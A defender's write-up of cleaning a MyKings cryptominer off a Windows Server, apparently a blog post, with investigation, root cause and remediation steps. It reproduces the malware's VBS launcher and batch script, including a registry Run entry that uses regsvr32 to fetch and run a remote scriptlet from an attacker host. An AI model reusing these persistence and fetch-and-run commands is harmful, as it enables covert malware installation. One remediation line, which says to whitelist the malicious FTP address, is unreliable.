How to Detect and Eradicate Hidden Windows Server Mining Malware

Cause

A Windows Server 2012 instance on Alibaba Cloud repeatedly rebooted with the firewall disabled; the support team could not find the cause and suggested a virus infection. Cloud monitoring revealed a high‑CPU process named lsma12.exe .

Investigation

The mining executable was located at

C:/windows/inf/aspnet/lsma12.exe

. Deleting it removed the process temporarily, but it reappeared after reboot. Five scheduled tasks were found, suggesting persistence via MBR and registry modifications.

The tasks included:

my1 : runs

c:/windows/system/my1.bat

daily at 12 PM.

Mysa : executes an FTP command to download a malicious

a.exe

to

c:\windows\update.exe

on system startup.

Mysa1 , Mysa2 , ok , ok1 : various commands that launch the mining program.

Downloading s.rar archive

Found a

.bat

script and a

.vbs

script.

The VBS file

n.vbs

simply creates a

Wscript.Shell

object to run

c3.bat

and then deletes itself.

<code>Set ws = CreateObject("Wscript.Shell")
Set fso = CreateObject("Scripting.Filesystemobject")
on error resume next
ws.run "C:\Windows\inf\c3.bat",vbhide
fso.DeleteFile(WScript.ScriptFullName)
wscript.quit
</code>

Detailed look at c3.bat

<code># Delete other competitor users
net1 user mm123$ /del&net1 user admin$ /del&net1 user sysadm05 /del
# Stop AnyDesk service
net stop AnyDesk&sc config AnyDesk start= disabled
# Set hidden and read‑only attributes on many .exe files
attrib -s -h -r C:\Users\Default\AppData\Local\Temp\*.exe&...
# Kill competitor processes
taskkill /f /im help.exe /im doc001.exe /im dhelllllper.exe ...
# Delete various files and set permissions
del c:\windows\temp\*.exe&del c:\windows\temp\king.exe&...
# Modify registry to add startup entry
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll" /f
# Delete the malicious scheduled tasks
schtasks /Delete /TN "Mysa" /F
schtasks /Delete /TN "Mysa1" /F
schtasks /Delete /TN "Mysa2" /F
schtasks /Delete /TN "Mysa3" /F
schtasks /Delete /TN "ok" /F
schtasks /Delete /TN "ok1" /F
# Remove WMI backdoor events and consumers
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm2_filter" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm2_consumer" DELETE
</code>

Abnormal service discovery

A service named xWinWpdSrv was running

C:/Windows/system/msinfo.exe -s -syn 1000

, interfering with the Network List service and causing network restrictions after reboot. The service was disabled.

Root cause analysis

Public reports suggest the malware (named mykings ) spreads via port 1433 brute‑force, EternalBlue (MS17‑010), and other weak credentials. The server had no SQL Server installed, and vulnerability scanning with the Windows‑Exploit‑Suggester script did not reveal exploitable patches, indicating a different intrusion vector.

Symptoms after infection

CPU spikes due to

lsma12.exe

process.

Firewall automatically enabled, a security policy named win created, and ports 139/445 blocked.

Malicious scheduled tasks and a WMI persistence backdoor.

Registry modifications and MBR infection.

Post‑infection the host attempts further brute‑force attacks on other servers.

Remediation steps

Add the malicious FTP address

ftp://ftp.ftp1202.site

to a whitelist or block it via hosts file.

Use Sysinternals

Autoruns

to remove suspicious startup entries (e.g., the

start

registry value).

Delete the malicious scheduled tasks:

Mysa

,

Mysa1

,

Mysa2

,

Mysa3

,

ok

,

ok1

.

Remove the WMI event filter/consumer named

fuckyoumm2

.

Delete the malware batch file

C:\Windows\system\my1.bat

.

Delete the mining executable

C:/windows/inf/aspnet/lsma12.exe

.

Repair the MBR using Tencent PC Manager’s System Aid Box.

Run a full system scan with reputable security tools.

Post‑remediation hardening

Close unnecessary ports, especially 139, 445, and 1433; configure cloud security groups accordingly.

Patch vulnerable services promptly.

Audit system accounts and remove any unknown users.

Enforce strong passwords and disable default accounts such as the SQL Server

sa

account.

References

https://wukungt.github.io/

http://www.sangfor.com.cn/about/source-news-company-news/1195.html

https://www.freebuf.com/vuls/194515.html

Thank you for following; happy New Year! Reply "抽奖" to the public account for a giveaway.